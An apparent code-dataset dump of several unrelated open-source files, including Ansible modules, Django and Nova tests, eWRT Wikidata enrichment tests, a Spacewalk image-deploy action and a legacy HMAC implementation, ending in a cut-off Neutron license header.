repo_name
stringlengths 5
100
| path
stringlengths 4
375
| copies
stringclasses 991
values | size
stringlengths 4
7
| content
stringlengths 666
1M
| license
stringclasses 15
values |
---|---|---|---|---|---|
danieljaouen/ansible | lib/ansible/modules/cloud/cloudstack/cs_staticnat.py | 21 | 6799 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015, René Moser <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cs_staticnat
short_description: Manages static NATs on Apache CloudStack based clouds.
description:
- Create, update and remove static NATs.
version_added: "2.0"
author: "René Moser (@resmo)"
options:
ip_address:
description:
- Public IP address the static NAT is assigned to.
required: true
vm:
description:
- Name of virtual machine which we make the static NAT for.
- Required if I(state=present).
vm_guest_ip:
description:
- VM guest NIC secondary IP address for the static NAT.
network:
description:
- Network the IP address is related to.
version_added: "2.2"
vpc:
description:
- VPC the network related to.
version_added: "2.3"
state:
description:
- State of the static NAT.
default: present
choices: [ present, absent ]
domain:
description:
- Domain the static NAT is related to.
account:
description:
- Account the static NAT is related to.
project:
description:
- Name of the project the static NAT is related to.
zone:
description:
- Name of the zone in which the virtual machine is in.
- If not set, default zone is used.
poll_async:
description:
- Poll async jobs until job has finished.
type: bool
default: yes
extends_documentation_fragment: cloudstack
'''
EXAMPLES = '''
- name: Create a static NAT for IP 1.2.3.4 to web01
local_action:
module: cs_staticnat
ip_address: 1.2.3.4
vm: web01
- name: Remove a static NAT
local_action:
module: cs_staticnat
ip_address: 1.2.3.4
state: absent
'''
RETURN = '''
---
id:
description: UUID of the ip_address.
returned: success
type: string
sample: a6f7a5fc-43f8-11e5-a151-feff819cdc9f
ip_address:
description: Public IP address.
returned: success
type: string
sample: 1.2.3.4
vm_name:
description: Name of the virtual machine.
returned: success
type: string
sample: web-01
vm_display_name:
description: Display name of the virtual machine.
returned: success
type: string
sample: web-01
vm_guest_ip:
description: IP of the virtual machine.
returned: success
type: string
sample: 10.101.65.152
zone:
description: Name of zone the static NAT is related to.
returned: success
type: string
sample: ch-gva-2
project:
description: Name of project the static NAT is related to.
returned: success
type: string
sample: Production
account:
description: Account the static NAT is related to.
returned: success
type: string
sample: example account
domain:
description: Domain the static NAT is related to.
returned: success
type: string
sample: example domain
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.cloudstack import (
AnsibleCloudStack,
cs_argument_spec,
cs_required_together,
)
class AnsibleCloudStackStaticNat(AnsibleCloudStack):
def __init__(self, module):
super(AnsibleCloudStackStaticNat, self).__init__(module)
self.returns = {
'virtualmachinedisplayname': 'vm_display_name',
'virtualmachinename': 'vm_name',
'ipaddress': 'ip_address',
'vmipaddress': 'vm_guest_ip',
}
def create_static_nat(self, ip_address):
self.result['changed'] = True
args = {
'virtualmachineid': self.get_vm(key='id'),
'ipaddressid': ip_address['id'],
'vmguestip': self.get_vm_guest_ip(),
'networkid': self.get_network(key='id')
}
if not self.module.check_mode:
self.query_api('enableStaticNat', **args)
# reset ip address and query new values
self.ip_address = None
ip_address = self.get_ip_address()
return ip_address
def update_static_nat(self, ip_address):
args = {
'virtualmachineid': self.get_vm(key='id'),
'ipaddressid': ip_address['id'],
'vmguestip': self.get_vm_guest_ip(),
'networkid': self.get_network(key='id')
}
# make an alias, so we can use has_changed()
ip_address['vmguestip'] = ip_address['vmipaddress']
if self.has_changed(args, ip_address, ['vmguestip', 'virtualmachineid']):
self.result['changed'] = True
if not self.module.check_mode:
res = self.query_api('disableStaticNat', ipaddressid=ip_address['id'])
self.poll_job(res, 'staticnat')
self.query_api('enableStaticNat', **args)
# reset ip address and query new values
self.ip_address = None
ip_address = self.get_ip_address()
return ip_address
def present_static_nat(self):
ip_address = self.get_ip_address()
if not ip_address['isstaticnat']:
ip_address = self.create_static_nat(ip_address)
else:
ip_address = self.update_static_nat(ip_address)
return ip_address
def absent_static_nat(self):
ip_address = self.get_ip_address()
if ip_address['isstaticnat']:
self.result['changed'] = True
if not self.module.check_mode:
res = self.query_api('disableStaticNat', ipaddressid=ip_address['id'])
poll_async = self.module.params.get('poll_async')
if poll_async:
self.poll_job(res, 'staticnat')
return ip_address
def main():
argument_spec = cs_argument_spec()
argument_spec.update(dict(
ip_address=dict(required=True),
vm=dict(),
vm_guest_ip=dict(),
network=dict(),
vpc=dict(),
state=dict(choices=['present', 'absent'], default='present'),
zone=dict(),
domain=dict(),
account=dict(),
project=dict(),
poll_async=dict(type='bool', default=True),
))
module = AnsibleModule(
argument_spec=argument_spec,
required_together=cs_required_together(),
supports_check_mode=True
)
acs_static_nat = AnsibleCloudStackStaticNat(module)
state = module.params.get('state')
if state in ['absent']:
ip_address = acs_static_nat.absent_static_nat()
else:
ip_address = acs_static_nat.present_static_nat()
result = acs_static_nat.get_result(ip_address)
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
geerlingguy/ansible | lib/ansible/modules/fetch.py | 7 | 3790 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# This is a virtual module that is entirely implemented as an action plugin and runs on the controller
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = r'''
---
module: fetch
short_description: Fetch files from remote nodes
description:
- This module works like M(copy), but in reverse.
- It is used for fetching files from remote machines and storing them locally in a file tree, organized by hostname.
- Files that already exist at I(dest) will be overwritten if they are different than the I(src).
- This module is also supported for Windows targets.
version_added: '0.2'
options:
src:
description:
- The file on the remote system to fetch.
- This I(must) be a file, not a directory.
- Recursive fetching may be supported in a later release.
required: yes
dest:
description:
- A directory to save the file into.
- For example, if the I(dest) directory is C(/backup) a I(src) file named C(/etc/profile) on host
C(host.example.com), would be saved into C(/backup/host.example.com/etc/profile).
The host name is based on the inventory name.
required: yes
fail_on_missing:
version_added: '1.1'
description:
- When set to C(yes), the task will fail if the remote file cannot be read for any reason.
- Prior to Ansible 2.5, setting this would only fail if the source file was missing.
- The default was changed to C(yes) in Ansible 2.5.
type: bool
default: yes
validate_checksum:
version_added: '1.4'
description:
- Verify that the source and destination checksums match after the files are fetched.
type: bool
default: yes
flat:
version_added: '1.2'
description:
- Allows you to override the default behavior of appending hostname/path/to/file to the destination.
- If C(dest) ends with '/', it will use the basename of the source file, similar to the copy module.
- This can be useful if working with a single host, or if retrieving files that are uniquely named per host.
- If using multiple hosts with the same filename, the file will be overwritten for each host.
type: bool
default: no
notes:
- When running fetch with C(become), the M(slurp) module will also be
used to fetch the contents of the file for determining the remote
checksum. This effectively doubles the transfer size, and
depending on the file size can consume all available memory on the
remote or local hosts causing a C(MemoryError). Due to this it is
advisable to run this module without C(become) whenever possible.
- Prior to Ansible 2.5 this module would not fail if reading the remote
file was impossible unless C(fail_on_missing) was set.
- In Ansible 2.5 or later, playbook authors are encouraged to use
C(fail_when) or C(ignore_errors) to get this ability. They may
also explicitly set C(fail_on_missing) to C(no) to get the
non-failing behaviour.
- This module is also supported for Windows targets.
seealso:
- module: copy
- module: slurp
author:
- Ansible Core Team
- Michael DeHaan
'''
EXAMPLES = r'''
- name: Store file into /tmp/fetched/host.example.com/tmp/somefile
fetch:
src: /tmp/somefile
dest: /tmp/fetched
- name: Specifying a path directly
fetch:
src: /tmp/somefile
dest: /tmp/prefix-{{ inventory_hostname }}
flat: yes
- name: Specifying a destination path
fetch:
src: /tmp/uniquefile
dest: /tmp/special/
flat: yes
- name: Storing in a path relative to the playbook
fetch:
src: /tmp/uniquefile
dest: special/prefix-{{ inventory_hostname }}
flat: yes
'''
| gpl-3.0 |
willharris/django | tests/sites_tests/tests.py | 8 | 8628 | from __future__ import unicode_literals
from django.apps import apps
from django.conf import settings
from django.contrib.sites import models
from django.contrib.sites.management import create_default_site
from django.contrib.sites.middleware import CurrentSiteMiddleware
from django.contrib.sites.models import Site, clear_site_cache
from django.contrib.sites.requests import RequestSite
from django.contrib.sites.shortcuts import get_current_site
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.db.models.signals import post_migrate
from django.http import HttpRequest
from django.test import TestCase, modify_settings, override_settings
from django.test.utils import captured_stdout
@modify_settings(INSTALLED_APPS={'append': 'django.contrib.sites'})
class SitesFrameworkTests(TestCase):
multi_db = True
def setUp(self):
self.site = Site(
id=settings.SITE_ID,
domain="example.com",
name="example.com",
)
self.site.save()
def test_site_manager(self):
# Make sure that get_current() does not return a deleted Site object.
s = Site.objects.get_current()
self.assertIsInstance(s, Site)
s.delete()
self.assertRaises(ObjectDoesNotExist, Site.objects.get_current)
def test_site_cache(self):
# After updating a Site object (e.g. via the admin), we shouldn't return a
# bogus value from the SITE_CACHE.
site = Site.objects.get_current()
self.assertEqual("example.com", site.name)
s2 = Site.objects.get(id=settings.SITE_ID)
s2.name = "Example site"
s2.save()
site = Site.objects.get_current()
self.assertEqual("Example site", site.name)
def test_delete_all_sites_clears_cache(self):
# When all site objects are deleted the cache should also
# be cleared and get_current() should raise a DoesNotExist.
self.assertIsInstance(Site.objects.get_current(), Site)
Site.objects.all().delete()
self.assertRaises(Site.DoesNotExist, Site.objects.get_current)
@override_settings(ALLOWED_HOSTS=['example.com'])
def test_get_current_site(self):
# Test that the correct Site object is returned
request = HttpRequest()
request.META = {
"SERVER_NAME": "example.com",
"SERVER_PORT": "80",
}
site = get_current_site(request)
self.assertIsInstance(site, Site)
self.assertEqual(site.id, settings.SITE_ID)
# Test that an exception is raised if the sites framework is installed
# but there is no matching Site
site.delete()
self.assertRaises(ObjectDoesNotExist, get_current_site, request)
# A RequestSite is returned if the sites framework is not installed
with self.modify_settings(INSTALLED_APPS={'remove': 'django.contrib.sites'}):
site = get_current_site(request)
self.assertIsInstance(site, RequestSite)
self.assertEqual(site.name, "example.com")
@override_settings(SITE_ID='', ALLOWED_HOSTS=['example.com'])
def test_get_current_site_no_site_id(self):
request = HttpRequest()
request.META = {
"SERVER_NAME": "example.com",
"SERVER_PORT": "80",
}
del settings.SITE_ID
site = get_current_site(request)
self.assertEqual(site.name, "example.com")
def test_domain_name_with_whitespaces(self):
# Regression for #17320
# Domain names are not allowed contain whitespace characters
site = Site(name="test name", domain="test test")
self.assertRaises(ValidationError, site.full_clean)
site.domain = "test\ttest"
self.assertRaises(ValidationError, site.full_clean)
site.domain = "test\ntest"
self.assertRaises(ValidationError, site.full_clean)
def test_clear_site_cache(self):
request = HttpRequest()
request.META = {
"SERVER_NAME": "example.com",
"SERVER_PORT": "80",
}
self.assertEqual(models.SITE_CACHE, {})
get_current_site(request)
expected_cache = {self.site.id: self.site}
self.assertEqual(models.SITE_CACHE, expected_cache)
with self.settings(SITE_ID=''):
get_current_site(request)
expected_cache.update({self.site.domain: self.site})
self.assertEqual(models.SITE_CACHE, expected_cache)
clear_site_cache(Site, instance=self.site, using='default')
self.assertEqual(models.SITE_CACHE, {})
@override_settings(SITE_ID='')
def test_clear_site_cache_domain(self):
site = Site.objects.create(name='example2.com', domain='example2.com')
request = HttpRequest()
request.META = {
"SERVER_NAME": "example2.com",
"SERVER_PORT": "80",
}
get_current_site(request) # prime the models.SITE_CACHE
expected_cache = {site.domain: site}
self.assertEqual(models.SITE_CACHE, expected_cache)
# Site exists in 'default' database so using='other' shouldn't clear.
clear_site_cache(Site, instance=site, using='other')
self.assertEqual(models.SITE_CACHE, expected_cache)
# using='default' should clear.
clear_site_cache(Site, instance=site, using='default')
self.assertEqual(models.SITE_CACHE, {})
class JustOtherRouter(object):
def allow_migrate(self, db, app_label, **hints):
return db == 'other'
@modify_settings(INSTALLED_APPS={'append': 'django.contrib.sites'})
class CreateDefaultSiteTests(TestCase):
multi_db = True
def setUp(self):
self.app_config = apps.get_app_config('sites')
# Delete the site created as part of the default migration process.
Site.objects.all().delete()
def test_basic(self):
"""
#15346, #15573 - create_default_site() creates an example site only if
none exist.
"""
with captured_stdout() as stdout:
create_default_site(self.app_config)
self.assertEqual(Site.objects.count(), 1)
self.assertIn("Creating example.com", stdout.getvalue())
with captured_stdout() as stdout:
create_default_site(self.app_config)
self.assertEqual(Site.objects.count(), 1)
self.assertEqual("", stdout.getvalue())
@override_settings(DATABASE_ROUTERS=[JustOtherRouter()])
def test_multi_db_with_router(self):
"""
#16353, #16828 - The default site creation should respect db routing.
"""
create_default_site(self.app_config, using='default', verbosity=0)
create_default_site(self.app_config, using='other', verbosity=0)
self.assertFalse(Site.objects.using('default').exists())
self.assertTrue(Site.objects.using('other').exists())
def test_multi_db(self):
create_default_site(self.app_config, using='default', verbosity=0)
create_default_site(self.app_config, using='other', verbosity=0)
self.assertTrue(Site.objects.using('default').exists())
self.assertTrue(Site.objects.using('other').exists())
def test_save_another(self):
"""
#17415 - Another site can be created right after the default one.
On some backends the sequence needs to be reset after saving with an
explicit ID. Test that there isn't a sequence collisions by saving
another site. This test is only meaningful with databases that use
sequences for automatic primary keys such as PostgreSQL and Oracle.
"""
create_default_site(self.app_config, verbosity=0)
Site(domain='example2.com', name='example2.com').save()
def test_signal(self):
"""
#23641 - Sending the ``post_migrate`` signal triggers creation of the
default site.
"""
post_migrate.send(sender=self.app_config, app_config=self.app_config, verbosity=0)
self.assertTrue(Site.objects.exists())
@override_settings(SITE_ID=35696)
def test_custom_site_id(self):
"""
#23945 - The configured ``SITE_ID`` should be respected.
"""
create_default_site(self.app_config, verbosity=0)
self.assertEqual(Site.objects.get().pk, 35696)
class MiddlewareTest(TestCase):
def test_request(self):
""" Makes sure that the request has correct `site` attribute. """
middleware = CurrentSiteMiddleware()
request = HttpRequest()
middleware.process_request(request)
self.assertEqual(request.site.id, settings.SITE_ID)
| bsd-3-clause |
weblyzard/ewrt | tests/ws/wikidata/test_bundle_wikipedia_requests.py | 1 | 15715 | #!/usr/bin/python
# -*- coding: utf-8 -*-
'''
Created on October 04, 2018
@author: jakob <[email protected]>
'''
from __future__ import print_function
from builtins import next
from builtins import str
from builtins import range
import datetime
import mock
import pytest
from eWRT.ws.wikidata.bundle_wikipedia_requests import collect_multiple_from_wikipedia, \
wikipedia_request_dispatcher, batch_enrich_from_wikipedia
GW_snapshot_wikidata_result = {
u'https://www.wikidata.org/wiki/Q23': {u'frwiki': u'George Washington',
u'position held': {
'url': 'https://www.wikidata.org/wiki/Property:P39',
'values': [{
'url': u'https://www.wikidata.org/wiki/Q11696',
'temporal_attributes': {
'end date': u'+1797-03-04T00:00:00Z',
'start date': u'+1789-04-30T00:00:00Z'},
'labels': {
'de': u'Pr\xe4sident der Vereinigten Staaten',
'en': u'President of the United States',
'fr': u'pr\xe9sident des \xc9tats-Unis',
'es': u'presidente de Estados Unidos'},
'claim_id': u'q23$B6E5D112-C27E-4E3F-BB65-CB12B9364092'},
{
'url': u'https://www.wikidata.org/wiki/Q1115127',
'temporal_attributes': {
'end date': u'+1799-12-14T00:00:00Z',
'start date': u'+1798-07-13T00:00:00Z'},
'labels': {
'de': u'Commanding General of the United States Army',
'en': u'Commanding General of the United States Army',
'fr': u'Commanding General of the United States Army',
'es': u'comandante general del Ej\xe9rcito de los Estados Unidos'},
'claim_id': u'Q23$6A44E261-3592-4928-979B-0BF1CAB2D39C'},
{
'url': u'https://www.wikidata.org/wiki/Q1115127',
'temporal_attributes': {
'end date': u'+1788-12-23T00:00:00Z',
'start date': u'+1775-06-15T00:00:00Z'},
'labels': {
'de': u'Commanding General of the United States Army',
'en': u'Commanding General of the United States Army',
'fr': u'Commanding General of the United States Army',
'es': u'comandante general del Ej\xe9rcito de los Estados Unidos'},
'claim_id': u'Q23$2c113ca2-4177-4a24-eb0c-6c284ff03416'}]},
'wikidata_timestamp': '2018-10-03T00:05:30Z',
'url': u'https://www.wikidata.org/wiki/Q23',
u'date of birth': {
'url': 'https://www.wikidata.org/wiki/Property:P569',
'values': [{
'claim_id': u'Q23$3BF0223A-D656-435B-9FD1-32E0B8F54A69',
'value': u'+1732-02-22T00:00:00Z'}]},
u'dewiki': u'George Washington',
u'eswiki': u'George Washington',
'labels': {
'de': u'George Washington',
'en': u'George Washington',
'fr': u'George Washington',
'es': u'George Washington'},
u'place of birth': {
'url': 'https://www.wikidata.org/wiki/Property:P19',
'values': [{
'url': u'https://www.wikidata.org/wiki/Q495645',
'labels': {
'de': u'Westmoreland County',
'en': u'Westmoreland County',
'fr': u'comt\xe9 de Westmoreland',
'es': u'Condado de Westmoreland'},
'claim_id': u'Q23$ca56ecac-bad6-4d4c-ad29-36a26244955a'}]},
u'enwiki': u'George Washington',
'descriptions': {
'de': u'erster Pr\xe4sident der Vereinigten Staaten von Amerika',
'en': u'first President of the United States',
'fr': u"premier pr\xe9sident des \xc9tats-Unis d'Am\xe9rique",
'es': u'primer presidente de los Estados Unidos de Am\xe9rica'},
'wikidata_id': u'Q23', 'country': {
'url': 'https://www.wikidata.org/wiki/Property:P17', 'values': [
{'url': u'https://www.wikidata.org/wiki/Q30',
'labels': {'de': u'Vereinigte Staaten',
'en': u'United States of America',
'fr': u'\xc9tats-Unis', 'es': u'Estados Unidos'},
'claim_id': u'Q23@q495645$A10AFE59-9C11-40BC-87A5-567221D430AA'}]},
'aliases': {'de': [
u'Pr\xe4sident Washington',
u'G. Washington'],
'en': [u'Washington',
u'President Washington',
u'G. Washington',
u'Father of the United States']}}}
GW_snapshot_wikipedia_result = {
'url': u'https://en.wikipedia.org/wiki/George_Washington',
'timestamp': u'2018-10-04T05:06:49Z',
'title': u'George Washington',
'language': 'en',
'summary': u'George Washington (February 22, 1732 \u2013 December 14, 1799) was '
u'one of the Founding Fathers of the United States and served as '
u'the nation\u2019s first President (1789\u20131797). In the '
u'American Revolutionary War, he commanded Patriot forces to '
u'victory against the British and their allies. He presided over '
u'the Constitutional Convention of 1787 which established the new '
u'federal government, and he has been called the "Father of His '
u'Country".\nWashington was born to a moderately prosperous '
u'Virginian family of colonial planters and slaveholders. He '
u'had early educational opportunities, learned mathematics, '
u'and soon launched a successful career as a surveyor which '
u'enabled him to make significant land investments. He then '
u'joined the Virginia militia and fought in the French and Indian '
u'War. He was appointed commander-in-chief of the Continental Army '
u'during the Revolutionary War, leading an allied campaign to '
u'victory at the Siege of Yorktown which ended the war. His '
u'devotion to Republicanism and revulsion for tyrannical power '
u'impelled him to decline further authority after victory, and '
u'he resigned as commander-in-chief in 1783.\nAs one of the '
u'country\u2019s premier statesmen, Washington was unanimously '
u'elected President by the Electoral College in the first two '
u'national elections. He promoted and oversaw implementation of '
u'a strong, well-financed national government. He remained '
u'impartial in the fierce rivalry between cabinet secretaries '
u'Thomas Jefferson and Alexander Hamilton, although he adopted '
u'Hamilton\'s economic plans. When the French Revolution plunged '
u'Europe into war, Washington assumed a policy of neutrality to '
u'protect American ships\u2014although the controversial Jay '
u'Treaty of 1795 normalized trade relations with Great Britain. '
u'He set precedents still in use today, such as the Cabinet '
u'advisory system, the inaugural address, the title "Mr. '
u'President", and the concept of a two-term office limit. His '
u'Farewell Address strongly warned against political partisanship, '
u'sectionalism, and involvement in foreign wars.\nWashington '
u'inherited slaves at age 11 and officially supported other '
u'slaveholders as late as 1793. He eventually became troubled '
u'with slavery, however, and he freed all his slaves in his will '
u'in 1799. He is widely known for his religious toleration while '
u'his religious beliefs have been thoroughly debated by '
u'historians. Upon his death, Washington was famously eulogized as '
u'"first in war, first in peace, and first in the hearts of his '
u'countrymen". He has been widely memorialized by monuments, art, '
u'places, stamps, and currency, and has been consistently ranked '
u'by scholars among the top American presidents.'}
sitelink_cache = {
'en': {'George Washington': u'https://www.wikidata.org/wiki/Q23'}}
# mock_enrich = mock.Mock()
# mock_enrich.return_value = (el for el in [GW_snapshot_wikipedia_result])
def batch_enrich_mock(title, language):
print(title
)
assert (language, title) == ('en', u'George Washington')
return ((GW_snapshot_wikipedia_result,))
@mock.patch(
target='eWRT.ws.wikidata.bundle_wikipedia_requests.wikipedia_page_info_from_titles',
new=batch_enrich_mock)
def test_batch_enrich_from_wikipedia():
"""
Using a mock for wikipedia_page_info_from_titles, this test runs fully
offline."""
enrichment_result = batch_enrich_from_wikipedia(
wikipedia_pages=sitelink_cache['en'],
entities_cache=GW_snapshot_wikidata_result,
language='en',
)
merge_result = next(enrichment_result)
assert_basic_structure_as_expected(merge_result)
assert merge_result['enwiki'] == GW_snapshot_wikipedia_result
def test_collect_multiple_from_wikipedia():
global sitelink_cache
enrichment_result = next(collect_multiple_from_wikipedia(
sitelinks_cache=sitelink_cache,
entities_cache=GW_snapshot_wikidata_result
))
try:
modified_sitelink_cache = {'de': {}}
enrichment_result = next(collect_multiple_from_wikipedia(
sitelinks_cache=modified_sitelink_cache,
entities_cache=GW_snapshot_wikidata_result
))
raise ValueError
except StopIteration:
pass
def test_enrich_from_wikipedia_offline():
"""
No mock, real call to Wikipedia API, basic structure should still be
the same but literal equivalence between merge_result['enwiki'] and
cached snapshot is not expected
"""
with mock.patch(target='eWRT.ws.wikidata.bundle_wikipedia_requests.wikipedia_page_info_from_titles',
new=batch_enrich_mock):
enrichment_result = next(batch_enrich_from_wikipedia(
wikipedia_pages=sitelink_cache['en'],
entities_cache=GW_snapshot_wikidata_result,
language='en',
))
assert_basic_structure_as_expected(enrichment_result)
assert GW_snapshot_wikipedia_result['timestamp'] == enrichment_result['enwiki']['timestamp']
def assert_basic_structure_as_expected(merged_result):
"""
Check whether the basic structure and keys included are as expected.
:param merged_result:
:return:
"""
assert isinstance(merged_result, dict)
assert merged_result['language'] == 'en'
other_language_wikis = ('dewiki', 'frwiki', 'eswiki')
# assert all([key not in merged_result for key in other_language_wikis])
assert merged_result['labels'] == 'George Washington'
assert all([key in merged_result['enwiki'] for key in
GW_snapshot_wikipedia_result])
assert isinstance(merged_result['enwiki'], dict)
wiki_timestamp = merged_result['enwiki']['timestamp']
try:
datetime.datetime.strptime(wiki_timestamp, u'%Y-%m-%dT%H:%M:%SZ')
except ValueError:
raise ValueError('Timestamp doesn\'t appear to be a valid time. '
'Timestamp returned was: {}, expected format {}'.format(
wiki_timestamp,
datetime.datetime.now().strftime(u'%Y-%m-%dT%H:%M:%SZ')))
assert u'2018-10-04T05:06:49Z' <= merged_result['enwiki'][
'timestamp'] < datetime.datetime.now().strftime(u'%Y-%m-%dT%H:%M:%SZ')
# todo: add test for similarity of retrieved summary with snapshot?
batch_calls = 0
def mock_batch_enrich(*args, **kwargs):
"""generator that yields 20 entities at a time, for no more than a
total of 100"""
global batch_calls
batch_calls += 1
if batch_calls > 5:
raise StopIteration
for i in range(20):
yield {}
@mock.patch(
target='eWRT.ws.wikidata.bundle_wikipedia_requests.batch_enrich_from_wikipedia',
new=mock_batch_enrich)
@pytest.mark.skip
def test_wikipedia_request_dispatcher():
sitelink_cache = {'en': {str(i): i for i in range(100)}}
results = wikipedia_request_dispatcher(sitelinks_cache=sitelink_cache,
entity_cache=GW_snapshot_wikidata_result,
languages=['en'])
returned = [result for result in results]
assert returned
assert len(returned) >= 100
| gpl-3.0 |
Pajinek/spacewalk | backend/server/action/image.py | 14 | 1837 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2011 SUSE LLC
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
from spacewalk.common.rhnLog import log_debug
from spacewalk.server import rhnSQL
from spacewalk.server.rhnLib import InvalidAction
# the "exposed" functions
__rhnexport__ = ['deploy']
# returns the values for deploying a virtual machine with an image
#
# file_name, checksum, mem_kb, vcpus, imageType
#
def deploy(serverId, actionId, dry_run=0):
log_debug(3)
statement = """
select aid.mem_kb, aid.vcpus, aid.bridge_device,aid.download_url,
aid.proxy_server, aid.proxy_user, aid.proxy_pass
from rhnActionImageDeploy aid
where aid.action_id = :action_id"""
h = rhnSQL.prepare(statement)
h.execute(action_id=actionId)
row = h.fetchone_dict()
if not row:
# No image for this action
raise InvalidAction("image.deploy: No image found for action id "
"%s and server %s" % (actionId, serverId))
for key in ['download_url', 'proxy_server', 'proxy_user', 'proxy_pass', 'bridge_device']:
if row[key] is None:
row[key] = ""
params = {
"downloadURL": row['download_url'],
"proxySettings": {"proxyURL": row['proxy_server'], "proxyUser": row['proxy_user'], "proxyPass": row['proxy_pass']},
"memKB": row['mem_kb'],
"vCPUs": row['vcpus'],
"domainName": "",
"virtBridge": row['bridge_device']}
return (params)
| gpl-2.0 |
pleaseproject/python-for-android | python3-alpha/extra_modules/gdata/Crypto/Hash/HMAC.py | 45 | 3337 | """HMAC (Keyed-Hashing for Message Authentication) Python module.
Implements the HMAC algorithm as described by RFC 2104.
This is just a copy of the Python 2.2 HMAC module, modified to work when
used on versions of Python before 2.2.
"""
__revision__ = "$Id: HMAC.py,v 1.5 2002/07/25 17:19:02 z3p Exp $"
import string
def _strxor(s1, s2):
"""Utility method. XOR the two strings s1 and s2 (must have same length).
"""
return "".join(map(lambda x, y: chr(ord(x) ^ ord(y)), s1, s2))
# The size of the digests returned by HMAC depends on the underlying
# hashing module used.
digest_size = None
class HMAC:
"""RFC2104 HMAC class.
This supports the API for Cryptographic Hash Functions (PEP 247).
"""
def __init__(self, key, msg = None, digestmod = None):
"""Create a new HMAC object.
key: key for the keyed hash object.
msg: Initial input for the hash, if provided.
digestmod: A module supporting PEP 247. Defaults to the md5 module.
"""
if digestmod == None:
from . import md5
digestmod = md5
self.digestmod = digestmod
self.outer = digestmod.new()
self.inner = digestmod.new()
try:
self.digest_size = digestmod.digest_size
except AttributeError:
self.digest_size = len(self.outer.digest())
blocksize = 64
ipad = "\x36" * blocksize
opad = "\x5C" * blocksize
if len(key) > blocksize:
key = digestmod.new(key).digest()
key = key + chr(0) * (blocksize - len(key))
self.outer.update(_strxor(key, opad))
self.inner.update(_strxor(key, ipad))
if (msg):
self.update(msg)
## def clear(self):
## raise NotImplementedError, "clear() method not available in HMAC."
def update(self, msg):
"""Update this hashing object with the string msg.
"""
self.inner.update(msg)
def copy(self):
"""Return a separate copy of this hashing object.
An update to this copy won't affect the original object.
"""
other = HMAC("")
other.digestmod = self.digestmod
other.inner = self.inner.copy()
other.outer = self.outer.copy()
return other
def digest(self):
"""Return the hash value of this hashing object.
This returns a string containing 8-bit data. The object is
not altered in any way by this function; you can continue
updating the object after calling this function.
"""
h = self.outer.copy()
h.update(self.inner.digest())
return h.digest()
def hexdigest(self):
"""Like digest(), but returns a string of hexadecimal digits instead.
"""
return "".join([string.zfill(hex(ord(x))[2:], 2)
for x in tuple(self.digest())])
def new(key, msg = None, digestmod = None):
"""Create a new hashing object and return it.
key: The starting key for the hash.
msg: if available, will immediately be hashed into the object's starting
state.
You can now feed arbitrary strings into the object using its update()
method, and can ask for the hash value at any time by calling its digest()
method.
"""
return HMAC(key, msg, digestmod)
| apache-2.0 |
akash1808/nova | nova/tests/functional/v3/test_extended_server_attributes.py | 28 | 2687 | # Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from nova.tests.functional.v3 import test_servers
CONF = cfg.CONF
CONF.import_opt('osapi_compute_extension',
'nova.api.openstack.compute.extensions')
class ExtendedServerAttributesJsonTest(test_servers.ServersSampleBase):
extension_name = "os-extended-server-attributes"
extra_extensions_to_load = ["os-access-ips"]
_api_version = 'v2'
def _get_flags(self):
f = super(ExtendedServerAttributesJsonTest, self)._get_flags()
f['osapi_compute_extension'] = CONF.osapi_compute_extension[:]
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.keypairs.Keypairs')
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.extended_ips.Extended_ips')
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.extended_ips_mac.'
'Extended_ips_mac')
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.extended_server_attributes.'
'Extended_server_attributes')
return f
def test_show(self):
uuid = self._post_server()
response = self._do_get('servers/%s' % uuid)
subs = self._get_regexes()
subs['hostid'] = '[a-f0-9]+'
subs['id'] = uuid
subs['instance_name'] = 'instance-\d{8}'
subs['hypervisor_hostname'] = r'[\w\.\-]+'
subs['access_ip_v4'] = '1.2.3.4'
subs['access_ip_v6'] = '80fe::'
self._verify_response('server-get-resp', subs, response, 200)
def test_detail(self):
uuid = self._post_server()
response = self._do_get('servers/detail')
subs = self._get_regexes()
subs['hostid'] = '[a-f0-9]+'
subs['id'] = uuid
subs['instance_name'] = 'instance-\d{8}'
subs['hypervisor_hostname'] = r'[\w\.\-]+'
subs['access_ip_v4'] = '1.2.3.4'
subs['access_ip_v6'] = '80fe::'
self._verify_response('servers-detail-resp', subs, response, 200)
| apache-2.0 |
miyakz1192/neutron | neutron/db/migration/models/frozen.py | 10 | 72451 | # Copyright (c) 2014 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
